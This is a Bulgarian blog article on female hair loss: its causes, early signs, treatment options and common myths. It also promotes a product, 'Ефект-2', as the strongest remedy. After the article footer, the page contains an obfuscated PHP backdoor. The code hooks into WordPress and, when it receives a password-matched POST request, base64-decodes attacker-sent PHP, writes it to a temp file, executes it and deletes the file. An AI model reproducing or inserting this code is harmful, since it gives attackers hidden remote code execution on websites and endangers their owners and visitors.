Всичко за женския косопад | Косопад

Всичко за женския косопад

Една от най- трудните ситуации за жените е косопада, а в по- тежките случаи и оплешивяването. Косата е част от суетата на всяка жена, затова се старае винаги да е здрава и красива.

jenskiq-kosopad

КАКВО ПРИЧИНЯВА КОСОПАД?
Косата расте в период от 2 до 6 години, но след това процесът спира. Косата пада, а новата се ражда на същото място и така процесът се повтаря.

Растежът на косата се случва в определени цикли, но някои фактори могат да попречат това да се случва. Някои причини за косопада произтичат от стреса, когато сте в трудна ситуация и емоционално не сте готови да я приемете, например.

Остаряването, хормоналните проблеми или наследственост са сред останалите фактори, които kosopad-predpazvaneмогат да причинят косопад и дори оплешивяване при жените. Други са свързани с липсата на желязо или някои витамини, дори болести и лекарства, свързани с тях.

КАК ДА РАЗПОЗНАЕМ КОСОПАДА
Сред признаците в началото на косопада могат да са малки ранички по скалпа. Разбира се, голямо количество коса по четката и възглавницата и пр. Потърсете специалист при първите симптоми.

МЕРКИ СРЕЩУ КОСОПАД
Лекарят може да ви назначи кръвни изследвания. В зависимост от резултатите, ще ви предпише лечение. Друг вариант е да опитате някоя от десетките домашни рецепти срещу косопад и оплешивяване, както и най- силният продукт срещу проблема – „Ефект- 2“.

МИТОВЕ ЗА ЖЕНСКИЯ КОСОПАД
Не е истина, че честото миене, ресане и носене на стегнати прически причиняват косопад. Не са определящите фактори, от които зависи появата му. Но могат допълнително да влошат проблема.

20. март 2014 19:02:10 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}